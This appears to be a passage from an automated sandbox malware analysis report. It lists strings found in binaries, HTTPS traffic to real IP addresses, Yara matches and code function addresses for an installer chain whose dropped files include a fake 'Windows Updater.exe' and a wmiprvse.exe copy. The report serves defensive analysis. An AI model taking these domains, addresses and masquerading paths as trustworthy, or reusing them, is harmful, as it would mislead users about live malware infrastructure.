                                  Source: v113.exe, 00000020.00000003.2567036448.000000000275D000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2730463369.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2737590571.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2734012036.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2561830112.000000000134F000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2649322052.00000000013C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.marvellover.com/updates.txt
                                  Source: a1.exe, 00000014.00000003.2316551653.000000000437D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.net/docs
                                  Source: ZmWSzgevgt.exe, 00000000.00000003.2006403390.0000000002560000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.exe, 00000000.00000003.2006775395.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000000.2008194649.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-1L53Q.tmp.7.drString found in binary or memory: https://www.remobjects.com/ps
                                  Source: setup.tmp, 00000004.00000002.4557910495.0000000005976000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.termsfeed.com/live/4bb495c
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.termsfeed.com/live/4bb495ca-d123-4f4d-a727-e9c
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000804000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.000000000596F000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.termsfeed.com/live/4bb495ca-d123-4f4d-a727-e9c4d0f3fabe
                                  Source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.000000000435A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI743D.tmp.21.dr, MSI5D6E.tmp.21.dr, MSIF8B5.tmp.20.dr, MSI80A8.tmp.21.dr, MSI232D.tmp.21.dr, MSIB1F8.tmp.21.dr, MSI80A7.tmp.21.dr, MSICDCA.tmp.21.dr, MSI12C7.tmp.21.drString found in binary or memory: https://www.thawte.com/cps0/
                                  Source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.000000000435A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI743D.tmp.21.dr, MSI5D6E.tmp.21.dr, MSIF8B5.tmp.20.dr, MSI80A8.tmp.21.dr, MSI232D.tmp.21.dr, MSIB1F8.tmp.21.dr, MSI80A7.tmp.21.dr, MSICDCA.tmp.21.dr, MSI12C7.tmp.21.drString found in binary or memory: https://www.thawte.com/repository0W
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                                  Source: unknownHTTPS traffic detected: 172.67.198.151:443 -> 192.168.2.5:49707 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.23.108.224:443 -> 192.168.2.5:49709 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49711 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.5:49814 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.5:49844 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 54.165.38.232:443 -> 192.168.2.5:50127 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 104.21.74.109:443 -> 192.168.2.5:50128 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 54.165.38.232:443 -> 192.168.2.5:50131 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 104.21.32.100:443 -> 192.168.2.5:50134 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:50141 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 54.165.38.232:443 -> 192.168.2.5:50145 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 54.165.38.232:443 -> 192.168.2.5:50181 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 104.21.12.138:443 -> 192.168.2.5:50188 version: TLS 1.2
                                  Source: Yara matchFile source: 14.2.wmiprvse.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.2.wmiprvse.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0000000E.00000002.4554265373.0000000011194000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: wmiprvse.exe PID: 6024, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\51ccd7e4634de4468d3b8ec370ae3220.tmp, type: DROPPED

                                  System Summary

                                  barindex
                                  Source: a3.exe.4.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8f5168a2-2
                                  Source: a3.exe.4.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_129b37d4-b
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_00276110 GetSystemDirectoryW,_wcschr,LoadLibraryExW,NtdllDefWindowProc_W,20_2_00276110
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002F5A30 NtdllDefWindowProc_W,20_2_002F5A30
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001C6020 NtdllDefWindowProc_W,20_2_001C6020
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001C40C0 NtdllDefWindowProc_W,20_2_001C40C0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001D6100 NtdllDefWindowProc_W,20_2_001D6100
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_00214468 NtdllDefWindowProc_W,20_2_00214468
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002144DE NtdllDefWindowProc_W,20_2_002144DE
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_0021459D NtdllDefWindowProc_W,20_2_0021459D
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001C6650 NtdllDefWindowProc_W,20_2_001C6650
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_0020A7E0 NtdllDefWindowProc_W,20_2_0020A7E0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001C6C10 NtdllDefWindowProc_W,20_2_001C6C10
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001D0F80 NtdllDefWindowProc_W,DeleteCriticalSection,20_2_001D0F80
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001CD080 NtdllDefWindowProc_W,20_2_001CD080
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001CD1F0 NtdllDefWindowProc_W,20_2_001CD1F0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001C34E0 NtdllDefWindowProc_W,GlobalAlloc,GlobalLock,GlobalUnlock,NtdllDefWindowProc_W,20_2_001C34E0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_00213950 NtdllDefWindowProc_W,20_2_00213950
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001C3A90 NtdllDefWindowProc_W,GlobalAlloc,GlobalLock,GlobalUnlock,NtdllDefWindowProc_W,20_2_001C3A90
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_0025BC10 NtdllDefWindowProc_W,20_2_0025BC10
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001E1F90 NtdllDefWindowProc_W,20_2_001E1F90
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_5556_1578979781
                                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIE2F.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_1001BCE74_2_1001BCE7
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_100280814_2_10028081
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_1001B0D04_2_1001B0D0
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_1001D9274_2_1001D927
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_100219D64_2_100219D6
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_1002227D4_2_1002227D
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_10022AA94_2_10022AA9
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_10028B054_2_10028B05
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_100285C34_2_100285C3
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_100226894_2_10022689
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_10021EA94_2_10021EA9
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpCode function: 4_2_10029EC24_2_10029EC2
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002F532020_2_002F5320
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001CF3C020_2_001CF3C0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002CFBF020_2_002CFBF0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_002EFE2020_2_002EFE20
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001D80C020_2_001D80C0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001DC20020_2_001DC200
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_003643E120_2_003643E1
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_0036C77920_2_0036C779
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001DAAE020_2_001DAAE0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001D8CD020_2_001D8CD0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001D2D7020_2_001D2D70
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_00296F5020_2_00296F50
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001B301020_2_001B3010
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_0035919020_2_00359190
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_0021331020_2_00213310
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001E94C020_2_001E94C0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_001CD63020_2_001CD630
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_0036188A20_2_0036188A
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_0028FC4020_2_0028FC40
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_00351F0C20_2_00351F0C
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A54D2C020_2_6A54D2C0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A54E81020_2_6A54E810
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A57683020_2_6A576830
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A580F5920_2_6A580F59
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A574FEA20_2_6A574FEA
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A574C5C20_2_6A574C5C
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A557DF020_2_6A557DF0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A5873B720_2_6A5873B7
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A58619020_2_6A586190
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A57F4D020_2_6A57F4D0
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: 20_2_6A57D4CA20_2_6A57D4CA
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000B472028_2_000B4720
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_0009877028_2_00098770
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000B4AC028_2_000B4AC0
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000913C028_2_000913C0
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000995B028_2_000995B0
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000BE86028_2_000BE860
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000D3E6028_2_000D3E60
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000E84EA28_2_000E84EA
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000E055528_2_000E0555
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000EC64028_2_000EC640
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000E08E328_2_000E08E3
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000C4F5028_2_000C4F50
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000B91A028_2_000B91A0
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000797B028_2_000797B0
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000F17CD28_2_000F17CD
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000858C028_2_000858C0
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000EDBC928_2_000EDBC9
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000722F028_2_000722F0
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000A64A028_2_000A64A0
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_0007255028_2_00072550
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_0006E82028_2_0006E820
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000BAC1028_2_000BAC10
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000F2F1128_2_000F2F11
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000E3E5028_2_000E3E50
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exeCode function: 28_2_000F7E6028_2_000F7E60
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0054472031_2_00544720
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0054E86031_2_0054E860
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_00544AC031_2_00544AC0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0054AC1031_2_0054AC10
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_00554F5031_2_00554F50
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_005213C031_2_005213C0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_005295B031_2_005295B0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_00563E6031_2_00563E60
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_005022F031_2_005022F0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_005784EA31_2_005784EA
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_005364A031_2_005364A0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0050255031_2_00502550
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0057055531_2_00570555
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0057C64031_2_0057C640
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0052877031_2_00528770
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_004FE82031_2_004FE820
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_005708E331_2_005708E3
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_00582F1131_2_00582F11
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_005491A031_2_005491A0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_005817CD31_2_005817CD
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_005097B031_2_005097B0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_005158C031_2_005158C0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_0057DBC931_2_0057DBC9
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_00573E5031_2_00573E50
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_00587E6031_2_00587E60
                                  Source: Joe Sandbox ViewDropped File: 680af9.rbf (copy) C7EE9A8357EEB602C67C4EDEDB3E96510352FDDA9BFDCE60C5902D4C0A57AF66
                                  Source: Joe Sandbox ViewDropped File: 680aff.rbf (copy) C7EE9A8357EEB602C67C4EDEDB3E96510352FDDA9BFDCE60C5902D4C0A57AF66
                                  Source: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exeProcess token adjusted: SecurityJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: String function: 6A56DCA0 appears 50 times
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeCode function: String function: 001B70D0 appears 36 times
